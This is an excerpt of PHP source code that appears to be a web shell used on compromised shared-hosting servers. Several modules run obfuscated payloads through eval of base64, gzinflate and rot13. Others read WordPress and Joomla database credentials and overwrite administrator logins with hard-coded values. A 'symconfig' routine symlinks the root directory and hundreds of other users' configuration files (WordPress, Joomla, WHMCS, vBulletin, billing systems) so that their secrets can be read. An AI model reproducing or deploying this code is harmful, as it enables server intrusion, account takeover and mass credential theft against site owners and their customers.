  1184. eval(str_rot13(gzinflate(str_rot13(base64_decode(('vUddQtswFH2v1P9jsZAapI4WJh4GesSY2nYvk+imPaygyPZ5B6jc5IZxOBP/fdf5IoXxsBeiSbGdZu491z6+MBxgkgtgswS5ThUOB7NZqBK4LWR+xTJIJoIbm6ZKDHlvCsF2lcYlmlykNJZPmyvmbAbvjEh1TjqbYC5ciooAuTHyZzLRhcHDUZQTH0zn6NyhzCVSdzLFytEkEUHPj45BQIlbGlnD2aQNG862qv4XXMYGEnS1JqKOt1vDiXg2EutsTJinwMtpfnBdXC0kluAU2RcasrPhIItsSBrco4m83lWhloJ4jBKRb7BiZSR9B/B0OABt9ma0R5yGbM2odB3srE52cFrsTiRWGxW0tPX0bQwfxvC+UFcCVqsoH/FfxMl2iwmAatJsNaPT0Zgo65FfH13vwHzNBK3GlKb5R3EQZ3fmYzydaaVHzJuCQVQoQoyWq8WX1W/NFqufF59K0dfLy8WStYEq9O84jR1uTGiKp9DIBdYHelK6bInpULyoPSyl2WcF76jyz2x2Cxcw+1jG/OH46Pzez72L2LjRMa5GHfQCP/Zx3CqyXbzwZVuZh8CGgx2tTEGfMyGRByy3mjKYO1AZmHL9uEwVLCD4+CnwGOhxHTG7lYM+p7lchBH8PqSrxY33uEPz7wqRh99RzEbvUWHIkA0M3sHMT64wI7cyEtyT7n1hFblhHnqd5Q/hs++zVmhEYBK2JT4COo3PLGPyzAKv66QsVpOloUYWz4cfvm5j62CJ6gYVrJQiD+29UjU77v3vM9a2lDZ/i1BJmIYfhYG3OObhgH7+mAut0QT70aeL5ef1qGF/1CZt3Yuag+41FL9KR3pQoAxdRnYISOf0DKuU3QR67dQ/0SY5GauOdWgde8dMlfGqDrZU7YC9vOKv9FxJkdg/Lmnzd2m92oRp75foQ9ui22+/OQT/Cw=='))))));
  1185. } elseif($_GET['do'] == 'loghunter')
  1186. {eval(str_rot13(gzinflate(str_rot13(base64_decode(("tUl7YtpVEP87VXyHiZMr0BLsPJqqgJ14QyBquuNrXEUlEExeeL2E5hZ7wS5pmu9+s7ZWgDM5RCmWJXt0f7Pz3JnJ52lphOsTQ+odbjFOjaGl1CCfWIlGTyPgLguIpQ+VoQKRYD7x8N8mDhsqC/iZRJ9DoxtDqNYDyx4xYA+20BUmvjEF7mw4wlL9WZ8J5o69b6lpcyhg8Qipju+aXkAVo35z+/az5KVGhoozmlEBilhLltbJyVCl6WULvpDx7kNE11lDpQ14NJsKY9hQKEyligc8DHNJFU8xcrXUKgRGV6hWhVooC6xMRCshRH2fz31OLQCfKtyQGVyNpOOg+DflE+hSPAhY+VyXsxRlZ6p3x+qRaWsK2sfqx3B13OZmN4E1QrZ9xuyqqkG5KyaEzCsuidTJdfbJEWEGzOYOE5PAim4j1fEJ/eSOSz7XHm5cqFE2n3bv1XwO4jeYFvfNxmyzNSgkrivclR7zuenIilALjFRpEM65SNzHY2A0nGubQ8Fdv+igZpH2sgfcAblAO6Vpj8lUPkUQYezqhVcB3r2DxaJFKL2AlvDykRjQbmRtpXt90eu0zi/+MJu9U/uijb8VuUxbclBEsBs45k+zkpS3K6iYBVLFaBylnOgI0hRL5Y3FQXRZfmiYBqEwMTNal2AkLeYk59Uya4KEVgfxLZhvd2PP9Djjmxm+i3WCbKyD0jm/ely2bV0lC8ZrMI/PSC4dTjskikOPWSQKiiRBlYk2KBQLancWQQZPKjtVNbgbxDLisK9w5ZNcjAFea4uBWE9P9T1a6/e7mtFxb8YtIi+SxYw7S8EcHX4+7R8bVxyhipKCcTHI0urpvyS8ijMz4sz1Wh6GxcLeoH3wp2nwmR/8RjF/+WNj9+FKVsElEitlvUooy9iV913ikmym133XiZ2pQbgjQUJZQrjEE5mO2peRjLGrIc0EvygbVDwqA/c8J+SOLzB2Q6kSJp0MzIZnS+ZUHcuQxS8P5vT/2KW2meKRHbey2DEnkutEuHe1GtDBZRMI6HD2F8rxaCjBjx+QTxpKDfidRgsLX/VsOyt7Mm/6IohStil49uKEetKv3+73D0KMWDsk3BP0jfIvrUvo8YG21e3o94+7mnP8FXTYGyqXptOW2vVBNe2kdNwiZh+r/Ns6D/N6WPV+vrTAT8slKBWe8WvLrREPoeMLav70RqakveP7ZuvYcdErllZIvvJ77rg0sNlJhj1PnYNCxUdCm/1rPK6MLByKKpbARIhG7ES6OQm5NTdvM7826yo34HbLiMVo85WApX0fXpBkw5+LB9CNtD7hkLPex0rFQBHbKs5S5j2nxQVCGfrXN63ehflb++a622H1zN56+/qm9OpMGzw9o09LDyIMydh1CsuTqb6lvxOKR6yiefbiK97cQF4lre4/idARGdaujmDr5XvpxPQXP/guZC3mu3GcxgGvFiMWRjD2jvXBa3biz+dp/gU="))))));}
  1187. elseif($_GET['do'] == 'auto_cu_wp') {
  1188. if($_POST['gass']) {
  1189. echo "<center><h1>WordPress Auto Change User 2</h1>
  1190. <form method='post'>
  1191. Link Config: <br>
  1192. <textarea name='link' style='width: 450px; height:250px;'>";
  1193. UrlLoop($_POST['linkconf'],'wordpress');
  1194. echo"</textarea><br>
  1195. <input type='submit' style='width: 450px;' name='auto_cu_wp' value='Submit'>
  1196. </form></center>";
  1197. } else {
  1198. echo "<center><h1>WordPress Auto Change User 2</h1>
  1199. <form method='post'>
  1200. Link Config: <br>
  1201. <input type='text' name='linkconf' height='10' size='50' placeholder='http://link.com/name_config/'><br>
  1202. <input type='submit' style='width: 450px;' name='gass' value='Submit'>
  1203. </form></center>";
  1204. }
  1205. if($_POST['auto_cu_wp']) {
  1206.  
  1207. function anucurl($sites) {
  1208. $ch = curl_init($sites);
  1209. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  1210. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  1211. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  1212. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
  1213. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  1214. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  1215. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  1216. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  1217. curl_setopt($ch, CURLOPT_COOKIESESSION,true);
  1218. $data = curl_exec($ch);
  1219. curl_close($ch);
  1220. return $data;
  1221. }
  1222. $link = explode("\r\n", $_POST['link']);
  1223. $user = "maling";
  1224. $pass = "maling27";
  1225. $passx = md5($pass);
  1226. foreach($link as $dir_config) {
  1227. $config = anucurl($dir_config);
  1228. $dbhost = ambilkata($config,"DB_HOST', '","'");
  1229. $dbuser = ambilkata($config,"DB_USER', '","'");
  1230. $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  1231. $dbname = ambilkata($config,"DB_NAME', '","'");
  1232. $dbprefix = ambilkata($config,"table_prefix = '","'");
  1233. $prefix = $dbprefix."users";
  1234. $option = $dbprefix."options";
  1235. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1236. $db = mysql_select_db($dbname);
  1237. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  1238. $result = mysql_fetch_array($q);
  1239. $id = $result[ID];
  1240. $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  1241. $result2 = mysql_fetch_array($q2);
  1242. $target = $result2[option_value];
  1243. if($target == '') {
  1244. echo "[-] <font color=red>error, gabisa ambil nama domain nya</font><br>";
  1245. } else {
  1246. echo "<font color=blue>[</font> $target <font color=blue>]</font></font><br>";
  1247. }
  1248. $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'");
  1249. if(!$conn OR !$db OR !$update) {
  1250. echo "[-] MySQL Error: <font color=red>".mysql_error()."</font><br><br>";
  1251. mysql_close($conn);
  1252. } else {
  1253. echo "[+] <a href='$target/wp-login.php' target='_blank'>$target/wp-login.php</a><br>";
  1254. echo "[+] username: <font color=blue>$user</font><br>";
  1255. echo "[+] password: <font color=blue>$pass</font><br><br>";
  1256.  
  1257. mysql_close($conn);
  1258. }
  1259. }
  1260. }
  1261.  
  1262. }
  1263. elseif($_GET['do'] == 'auto_cu_joomla') {
  1264. if($_POST['gass']) {
  1265. echo "<center><h1>Joomla Auto Change User 2</h1>
  1266. <form method='post'>
  1267. Link Config: <br>
  1268. <textarea name='link' style='width: 450px; height:250px;'>";
  1269. UrlLoop($_POST['linkconf'],'joomla');
  1270. echo"</textarea><br>
  1271. <input type='submit' style='width: 450px;' name='auto_cu_joomla' value='Submit'>
  1272. </form></center>";
  1273. } else {
  1274. echo "<center><h1>Joomla Auto Change User 2</h1>
  1275. <form method='post'>
  1276. Link Config: <br>
  1277. <input type='text' name='linkconf' height='10' size='50' placeholder='http://link.com/name_config/'><br>
  1278. <input type='submit' style='width: 450px;' name='gass' value='Submit'>
  1279. </form></center>";
  1280. }
  1281. if($_POST['auto_cu_joomla']) {
  1282.  
  1283. function anucurl($sites) {
  1284. $ch = curl_init($sites);
  1285. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  1286. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  1287. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  1288. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
  1289. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  1290. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  1291. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  1292. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  1293. curl_setopt($ch, CURLOPT_COOKIESESSION,true);
  1294. $data = curl_exec($ch);
  1295. curl_close($ch);
  1296. return $data;
  1297. }
  1298. $link = explode("\r\n", $_POST['link']);
  1299. $user = "maling";
  1300. $pass = "maling27";
  1301. $passx = md5($pass);
  1302. foreach($link as $dir_config) {
  1303. $config = anucurl($dir_config);
  1304. $dbhost = ambilkata($config,"host = '","'");
  1305. $dbuser = ambilkata($config,"user = '","'");
  1306. $dbpass = ambilkata($config,"password = '","'");
  1307. $dbname = ambilkata($config,"db = '","'");
  1308. $dbprefix = ambilkata($config,"dbprefix = '","'");
  1309. $prefix = $dbprefix."users";
  1310. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1311. $db = mysql_select_db($dbname);
  1312. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  1313. $result = mysql_fetch_array($q);
  1314. $id = $result['id'];
  1315. $site = ambilkata($config,"sitename = '","'");
  1316. $update = mysql_query("UPDATE $prefix SET username='$user',password='$passx' WHERE id='$id'");
  1317. echo "Config => ".$dir_config."<br>";
  1318. echo "CMS => Joomla<br>";
  1319. if($site == '') {
  1320. echo "Sitename => <font color=red>error, gabisa ambil nama domain nya</font><br>";
  1321. } else {
  1322. echo "Sitename => $site<br>";
  1323. }
  1324. if(!$update OR !$conn OR !$db) {
  1325. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  1326. } else {
  1327. echo "Status => Done , Username : <font color=blue>$user</font> Password : <font color=blue>$pass</font><br><br>";
  1328. }
  1329. mysql_close($conn);
  1330. }
  1331. }
  1332. }
  1333. elseif($_GET['do'] == 'symconfig') {
  1334. if(strtolower(substr(PHP_OS, 0, 3)) == "win"){
  1335. echo '<script>alert("Skid this won\'t work on Windows")</script>';
  1336. exit;
  1337. }
  1338. else
  1339. {
  1340. if($_POST["m"] && !$_POST["passwd"]==""){
  1341. @mkdir("Vlyn_symconf", 0777);
  1342. @chdir("Vlyn_symconf");
  1343. @symlink("/","root");
  1344. $htaccess="Options Indexes FollowSymLinks
  1345. DirectoryIndex janVlyn.htm
  1346. AddType text/plain .php
  1347. AddHandler text/plain .php
  1348. Satisfy Any";
  1349. @file_put_contents(".htaccess",$htaccess);
  1350. $etc_passwd=$_POST["passwd"];
  1351. $etc_passwd=explode("\n",$etc_passwd);
  1352. foreach($etc_passwd as $passwd){
  1353. $pawd=explode(":",$passwd);
  1354. $user =$pawd[0];
  1355.  
  1356. @symlink('/','Vlyn_symconf/root');
  1357. @symlink('/home/'.$user.'/public_html/vb/includes/config.php',$user.'-Vbulletin.txt');
  1358. @symlink('/home/'.$user.'/public_html/includes/config.php',$user.'-Vbulletin.txt');
  1359. @symlink('/home/'.$user.'/public_html/forum/includes/config.php',$user.'-Vbulletin.txt');
  1360. @symlink('/home/'.$user.'/public_html/forums/includes/config.php',$user.'-Vbulletin.txt');
  1361. @symlink('/home/'.$user.'/public_html/cc/includes/config.php',$user.'-Vbulletin.txt');
  1362. @symlink('/home/'.$user.'/public_html/inc/config.php',$user.'-MyBB.txt');
  1363. @symlink('/home/'.$user.'/public_html/includes/configure.php',$user.'-OsCommerce.txt');
  1364. @symlink('/home/'.$user.'/public_html/shop/includes/configure.php',$user.'-OsCommerce.txt');
  1365. @symlink('/home/'.$user.'/public_html/os/includes/configure.php',$user.'-OsCommerce.txt');
  1366. @symlink('/home/'.$user.'/public_html/oscom/includes/configure.php',$user.'-OsCommerce.txt');
  1367. @symlink('/home/'.$user.'/public_html/products/includes/configure.php',$user.'-OsCommerce.txt');
  1368. @symlink('/home/'.$user.'/public_html/cart/includes/configure.php',$user.'-OsCommerce.txt');
  1369. @symlink('/home/'.$user.'/public_html/inc/conf_global.php',$user.'-IPB.txt');
  1370. @symlink('/home/'.$user.'/public_html/wp-config.php',$user.'-Wordpress.txt');
  1371. @symlink('/home/'.$user.'/public_html/wp/test/wp-config.php',$user.'-Wordpress.txt');
  1372. @symlink('/home/'.$user.'/public_html/blog/wp-config.php',$user.'-Wordpress.txt');
  1373. @symlink('/home/'.$user.'/public_html/beta/wp-config.php',$user.'-Wordpress.txt');
  1374. @symlink('/home/'.$user.'/public_html/portal/wp-config.php',$user.'-Wordpress.txt');
  1375. @symlink('/home/'.$user.'/public_html/site/wp-config.php',$user.'-Wordpress.txt');
  1376. @symlink('/home/'.$user.'/public_html/wp/wp-config.php',$user.'-Wordpress.txt');
  1377. @symlink('/home/'.$user.'/public_html/WP/wp-config.php',$user.'-Wordpress.txt');
  1378. @symlink('/home/'.$user.'/public_html/news/wp-config.php',$user.'-Wordpress.txt');
  1379. @symlink('/home/'.$user.'/public_html/wordpress/wp-config.php',$user.'-Wordpress.txt');
  1380. @symlink('/home/'.$user.'/public_html/test/wp-config.php',$user.'-Wordpress.txt');
  1381. @symlink('/home/'.$user.'/public_html/demo/wp-config.php',$user.'-Wordpress.txt');
  1382. @symlink('/home/'.$user.'/public_html/home/wp-config.php',$user.'-Wordpress.txt');
  1383. @symlink('/home/'.$user.'/public_html/v1/wp-config.php',$user.'-Wordpress.txt');
  1384. @symlink('/home/'.$user.'/public_html/v2/wp-config.php',$user.'-Wordpress.txt');
  1385. @symlink('/home/'.$user.'/public_html/press/wp-config.php',$user.'-Wordpress.txt');
  1386. @symlink('/home/'.$user.'/public_html/new/wp-config.php',$user.'-Wordpress.txt');
  1387. @symlink('/home/'.$user.'/public_html/blogs/wp-config.php',$user.'-Wordpress.txt');
  1388. @symlink('/home/'.$user.'/public_html/configuration.php',$user.'-Joomla.txt');
  1389. @symlink('/home/'.$user.'/public_html/blog/configuration.php',$user.'-Joomla.txt');
  1390. @symlink('/home/'.$user.'/public_html/submitticket.php',$user.'-^WHMCS.txt');
  1391. @symlink('/home/'.$user.'/public_html/cms/configuration.php',$user.'-Joomla.txt');
  1392. @symlink('/home/'.$user.'/public_html/beta/configuration.php',$user.'-Joomla.txt');
  1393. @symlink('/home/'.$user.'/public_html/portal/configuration.php',$user.'-Joomla.txt');
  1394. @symlink('/home/'.$user.'/public_html/site/configuration.php',$user.'-Joomla.txt');
  1395. @symlink('/home/'.$user.'/public_html/main/configuration.php',$user.'-Joomla.txt');
  1396. @symlink('/home/'.$user.'/public_html/home/configuration.php',$user.'-Joomla.txt');
  1397. @symlink('/home/'.$user.'/public_html/demo/configuration.php',$user.'-Joomla.txt');
  1398. @symlink('/home/'.$user.'/public_html/test/configuration.php',$user.'-Joomla.txt');
  1399. @symlink('/home/'.$user.'/public_html/v1/configuration.php',$user.'-Joomla.txt');
  1400. @symlink('/home/'.$user.'/public_html/v2/configuration.php',$user.'-Joomla.txt');
  1401. @symlink('/home/'.$user.'/public_html/joomla/configuration.php',$user.'-Joomla.txt');
  1402. @symlink('/home/'.$user.'/public_html/new/configuration.php',$user.'-Joomla.txt');
  1403. @symlink('/home/'.$user.'/public_html/WHMCS/configuration.php',$user.'-WHMCS.txt');
  1404. @symlink('/home/'.$user.'/public_html/whmcs1/configuration.php',$user.'-WHMCS.txt');
  1405. @symlink('/home/'.$user.'/public_html/Whmcs/configuration.php',$user.'-WHMCS.txt');
  1406. @symlink('/home/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  1407. @symlink('/home/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  1408. @symlink('/home/'.$user.'/public_html/WHMC/configuration.php',$user.'-WHMCS.txt');
  1409. @symlink('/home/'.$user.'/public_html/Whmc/configuration.php',$user.'-WHMCS.txt');
  1410. @symlink('/home/'.$user.'/public_html/whmc/configuration.php',$user.'-WHMCS.txt');
  1411. @symlink('/home/'.$user.'/public_html/WHM/configuration.php',$user.'-WHMCS.txt');
  1412. @symlink('/home/'.$user.'/public_html/Whm/configuration.php',$user.'-WHMCS.txt');
  1413. @symlink('/home/'.$user.'/public_html/whm/configuration.php',$user.'-WHMCS.txt');
  1414. @symlink('/home/'.$user.'/public_html/HOST/configuration.php',$user.'-WHMCS.txt');
  1415. @symlink('/home/'.$user.'/public_html/Host/configuration.php',$user.'-WHMCS.txt');
  1416. @symlink('/home/'.$user.'/public_html/host/configuration.php',$user.'-WHMCS.txt');
  1417. @symlink('/home/'.$user.'/public_html/SUPPORTES/configuration.php',$user.'-WHMCS.txt');
  1418. @symlink('/home/'.$user.'/public_html/Supportes/configuration.php',$user.'-WHMCS.txt');
  1419. @symlink('/home/'.$user.'/public_html/supportes/configuration.php',$user.'-WHMCS.txt');
  1420. @symlink('/home/'.$user.'/public_html/domains/configuration.php',$user.'-WHMCS.txt');
  1421. @symlink('/home/'.$user.'/public_html/domain/configuration.php',$user.'-WHMCS.txt');
  1422. @symlink('/home/'.$user.'/public_html/Hosting/configuration.php',$user.'-WHMCS.txt');
  1423. @symlink('/home/'.$user.'/public_html/HOSTING/configuration.php',$user.'-WHMCS.txt');
  1424. @symlink('/home/'.$user.'/public_html/hosting/configuration.php',$user.'-WHMCS.txt');
  1425. @symlink('/home/'.$user.'/public_html/CART/configuration.php',$user.'-WHMCS.txt');
  1426. @symlink('/home/'.$user.'/public_html/Cart/configuration.php',$user.'-WHMCS.txt');
  1427. @symlink('/home/'.$user.'/public_html/cart/configuration.php',$user.'-WHMCS.txt');
  1428. @symlink('/home/'.$user.'/public_html/ORDER/configuration.php',$user.'-WHMCS.txt');
  1429. @symlink('/home/'.$user.'/public_html/Order/configuration.php',$user.'-WHMCS.txt');
  1430. @symlink('/home/'.$user.'/public_html/order/configuration.php',$user.'-WHMCS.txt');
  1431. @symlink('/home/'.$user.'/public_html/CLIENT/configuration.php',$user.'-WHMCS.txt');
  1432. @symlink('/home/'.$user.'/public_html/Client/configuration.php',$user.'-WHMCS.txt');
  1433. @symlink('/home/'.$user.'/public_html/client/configuration.php',$user.'-WHMCS.txt');
  1434. @symlink('/home/'.$user.'/public_html/CLIENTAREA/configuration.php',$user.'-WHMCS.txt');
  1435. @symlink('/home/'.$user.'/public_html/Clientarea/configuration.php',$user.'-WHMCS.txt');
  1436. @symlink('/home/'.$user.'/public_html/clientarea/configuration.php',$user.'-WHMCS.txt');
  1437. @symlink('/home/'.$user.'/public_html/SUPPORT/configuration.php',$user.'-WHMCS.txt');
  1438. @symlink('/home/'.$user.'/public_html/Support/configuration.php',$user.'-WHMCS.txt');
  1439. @symlink('/home/'.$user.'/public_html/support/configuration.php',$user.'-WHMCS.txt');
  1440. @symlink('/home/'.$user.'/public_html/BILLING/configuration.php',$user.'-WHMCS.txt');
  1441. @symlink('/home/'.$user.'/public_html/Billing/configuration.php',$user.'-WHMCS.txt');
  1442. @symlink('/home/'.$user.'/public_html/billing/configuration.php',$user.'-WHMCS.txt');
  1443. @symlink('/home/'.$user.'/public_html/BUY/configuration.php',$user.'-WHMCS.txt');
  1444. @symlink('/home/'.$user.'/public_html/Buy/configuration.php',$user.'-WHMCS.txt');
  1445. @symlink('/home/'.$user.'/public_html/buy/configuration.php',$user.'-WHMCS.txt');
  1446. @symlink('/home/'.$user.'/public_html/MANAGE/configuration.php',$user.'-WHMCS.txt');
  1447. @symlink('/home/'.$user.'/public_html/Manage/configuration.php',$user.'-WHMCS.txt');
  1448. @symlink('/home/'.$user.'/public_html/manage/configuration.php',$user.'-WHMCS.txt');
  1449. @symlink('/home/'.$user.'/public_html/CLIENTSUPPORT/configuration.php',$user.'-WHMCS.txt');
  1450. @symlink('/home/'.$user.'/public_html/ClientSupport/configuration.php',$user.'-WHMCS.txt');
  1451. @symlink('/home/'.$user.'/public_html/Clientsupport/configuration.php',$user.'-WHMCS.txt');
  1452. @symlink('/home/'.$user.'/public_html/clientsupport/configuration.php',$user.'-WHMCS.txt');
  1453. @symlink('/home/'.$user.'/public_html/CHECKOUT/configuration.php',$user.'-WHMCS.txt');
  1454. @symlink('/home/'.$user.'/public_html/Checkout/configuration.php',$user.'-WHMCS.txt');
  1455. @symlink('/home/'.$user.'/public_html/checkout/configuration.php',$user.'-WHMCS.txt');
  1456. @symlink('/home/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  1457. @symlink('/home/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  1458. @symlink('/home/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  1459. @symlink('/home/'.$user.'/public_html/BASKET/configuration.php',$user.'-WHMCS.txt');
  1460. @symlink('/home/'.$user.'/public_html/Basket/configuration.php',$user.'-WHMCS.txt');
  1461. @symlink('/home/'.$user.'/public_html/basket/configuration.php',$user.'-WHMCS.txt');
  1462. @symlink('/home/'.$user.'/public_html/SECURE/configuration.php',$user.'-WHMCS.txt');
  1463. @symlink('/home/'.$user.'/public_html/Secure/configuration.php',$user.'-WHMCS.txt');
  1464. @symlink('/home/'.$user.'/public_html/secure/configuration.php',$user.'-WHMCS.txt');
  1465. @symlink('/home/'.$user.'/public_html/SALES/configuration.php',$user.'-WHMCS.txt');
  1466. @symlink('/home/'.$user.'/public_html/Sales/configuration.php',$user.'-WHMCS.txt');
  1467. @symlink('/home/'.$user.'/public_html/sales/configuration.php',$user.'-WHMCS.txt');
  1468. @symlink('/home/'.$user.'/public_html/BILL/configuration.php',$user.'-WHMCS.txt');
  1469. @symlink('/home/'.$user.'/public_html/Bill/configuration.php',$user.'-WHMCS.txt');
  1470. @symlink('/home/'.$user.'/public_html/bill/configuration.php',$user.'-WHMCS.txt');
  1471. @symlink('/home/'.$user.'/public_html/PURCHASE/configuration.php',$user.'-WHMCS.txt');
  1472. @symlink('/home/'.$user.'/public_html/Purchase/configuration.php',$user.'-WHMCS.txt');
  1473. @symlink('/home/'.$user.'/public_html/purchase/configuration.php',$user.'-WHMCS.txt');
  1474. @symlink('/home/'.$user.'/public_html/ACCOUNT/configuration.php',$user.'-WHMCS.txt');
  1475. @symlink('/home/'.$user.'/public_html/Account/configuration.php',$user.'-WHMCS.txt');
  1476. @symlink('/home/'.$user.'/public_html/account/configuration.php',$user.'-WHMCS.txt');
  1477. @symlink('/home/'.$user.'/public_html/USER/configuration.php',$user.'-WHMCS.txt');
  1478. @symlink('/home/'.$user.'/public_html/User/configuration.php',$user.'-WHMCS.txt');
  1479. @symlink('/home/'.$user.'/public_html/user/configuration.php',$user.'-WHMCS.txt');
  1480. @symlink('/home/'.$user.'/public_html/CLIENTS/configuration.php',$user.'-WHMCS.txt');
  1481. @symlink('/home/'.$user.'/public_html/Clients/configuration.php',$user.'-WHMCS.txt');
  1482. @symlink('/home/'.$user.'/public_html/clients/configuration.php',$user.'-WHMCS.txt');
  1483. @symlink('/home/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  1484. @symlink('/home/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  1485. @symlink('/home/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  1486. @symlink('/home/'.$user.'/public_html/MY/configuration.php',$user.'-WHMCS.txt');
  1487. @symlink('/home/'.$user.'/public_html/My/configuration.php',$user.'-WHMCS.txt');
  1488. @symlink('/home/'.$user.'/public_html/my/configuration.php',$user.'-WHMCS.txt');
  1489. @symlink('/home/'.$user.'/public_html/secure/whm/configuration.php',$user.'-WHMCS.txt');
  1490. @symlink('/home/'.$user.'/public_html/secure/whmcs/configuration.php',$user.'-WHMCS.txt');
  1491. @symlink('/home/'.$user.'/public_html/panel/configuration.php',$user.'-WHMCS.txt');
  1492. @symlink('/home/'.$user.'/public_html/clientes/configuration.php',$user.'-WHMCS.txt');
  1493. @symlink('/home/'.$user.'/public_html/cliente/configuration.php',$user.'-WHMCS.txt');
  1494. @symlink('/home/'.$user.'/public_html/support/order/configuration.php',$user.'-WHMCS.txt');
  1495. @symlink('/home/'.$user.'/public_html/bb-config.php',$user.'-BoxBilling.txt');
  1496. @symlink('/home/'.$user.'/public_html/boxbilling/bb-config.php',$user.'-BoxBilling.txt');
  1497. @symlink('/home/'.$user.'/public_html/box/bb-config.php',$user.'-BoxBilling.txt');
  1498. @symlink('/home/'.$user.'/public_html/host/bb-config.php',$user.'-BoxBilling.txt');
  1499. @symlink('/home/'.$user.'/public_html/Host/bb-config.php',$user.'-BoxBilling.txt');
  1500. @symlink('/home/'.$user.'/public_html/supportes/bb-config.php',$user.'-BoxBilling.txt');
  1501. @symlink('/home/'.$user.'/public_html/support/bb-config.php',$user.'-BoxBilling.txt');
  1502. @symlink('/home/'.$user.'/public_html/hosting/bb-config.php',$user.'-BoxBilling.txt');
  1503. @symlink('/home/'.$user.'/public_html/cart/bb-config.php',$user.'-BoxBilling.txt');
  1504. @symlink('/home/'.$user.'/public_html/order/bb-config.php',$user.'-BoxBilling.txt');
  1505. @symlink('/home/'.$user.'/public_html/client/bb-config.php',$user.'-BoxBilling.txt');
  1506. @symlink('/home/'.$user.'/public_html/clients/bb-config.php',$user.'-BoxBilling.txt');
  1507. @symlink('/home/'.$user.'/public_html/cliente/bb-config.php',$user.'-BoxBilling.txt');
  1508. @symlink('/home/'.$user.'/public_html/clientes/bb-config.php',$user.'-BoxBilling.txt');
  1509. @symlink('/home/'.$user.'/public_html/billing/bb-config.php',$user.'-BoxBilling.txt');
  1510. @symlink('/home/'.$user.'/public_html/billings/bb-config.php',$user.'-BoxBilling.txt');
  1511. @symlink('/home/'.$user.'/public_html/my/bb-config.php',$user.'-BoxBilling.txt');
  1512. @symlink('/home/'.$user.'/public_html/secure/bb-config.php',$user.'-BoxBilling.txt');
  1513. @symlink('/home/'.$user.'/public_html/support/order/bb-config.php',$user.'-BoxBilling.txt');
  1514. @symlink('/home/'.$user.'/public_html/includes/dist-configure.php',$user.'-Zencart.txt');
  1515. @symlink('/home/'.$user.'/public_html/zencart/includes/dist-configure.php',$user.'-Zencart.txt');
  1516. @symlink('/home/'.$user.'/public_html/products/includes/dist-configure.php',$user.'-Zencart.txt');
  1517. @symlink('/home/'.$user.'/public_html/cart/includes/dist-configure.php',$user.'-Zencart.txt');
  1518. @symlink('/home/'.$user.'/public_html/shop/includes/dist-configure.php',$user.'-Zencart.txt');
  1519. @symlink('/home/'.$user.'/public_html/includes/iso4217.php',$user.'-Hostbills.txt');
  1520. @symlink('/home/'.$user.'/public_html/hostbills/includes/iso4217.php',$user.'-Hostbills.txt');
  1521. @symlink('/home/'.$user.'/public_html/host/includes/iso4217.php',$user.'-Hostbills.txt');
  1522. @symlink('/home/'.$user.'/public_html/Host/includes/iso4217.php',$user.'-Hostbills.txt');
  1523. @symlink('/home/'.$user.'/public_html/supportes/includes/iso4217.php',$user.'-Hostbills.txt');
  1524. @symlink('/home/'.$user.'/public_html/support/includes/iso4217.php',$user.'-Hostbills.txt');
  1525. @symlink('/home/'.$user.'/public_html/hosting/includes/iso4217.php',$user.'-Hostbills.txt');
  1526. @symlink('/home/'.$user.'/public_html/cart/includes/iso4217.php',$user.'-Hostbills.txt');
  1527. @symlink('/home/'.$user.'/public_html/order/includes/iso4217.php',$user.'-Hostbills.txt');
  1528. @symlink('/home/'.$user.'/public_html/client/includes/iso4217.php',$user.'-Hostbills.txt');
  1529. @symlink('/home/'.$user.'/public_html/clients/includes/iso4217.php',$user.'-Hostbills.txt');
  1530. @symlink('/home/'.$user.'/public_html/cliente/includes/iso4217.php',$user.'-Hostbills.txt');
  1531. @symlink('/home/'.$user.'/public_html/clientes/includes/iso4217.php',$user.'-Hostbills.txt');
  1532. @symlink('/home/'.$user.'/public_html/billing/includes/iso4217.php',$user.'-Hostbills.txt');
  1533. @symlink('/home/'.$user.'/public_html/billings/includes/iso4217.php',$user.'-Hostbills.txt');
  1534. @symlink('/home/'.$user.'/public_html/my/includes/iso4217.php',$user.'-Hostbills.txt');
  1535. @symlink('/home/'.$user.'/public_html/secure/includes/iso4217.php',$user.'-Hostbills.txt');
  1536. @symlink('/home/'.$user.'/public_html/support/order/includes/iso4217.php',$user.'-Hostbills.txt');
  1537.  
  1538. //Home1
  1539.  
  1540. @symlink('/home1/'.$user.'/public_html/vb/includes/config.php',$user.'-Vbulletin.txt');
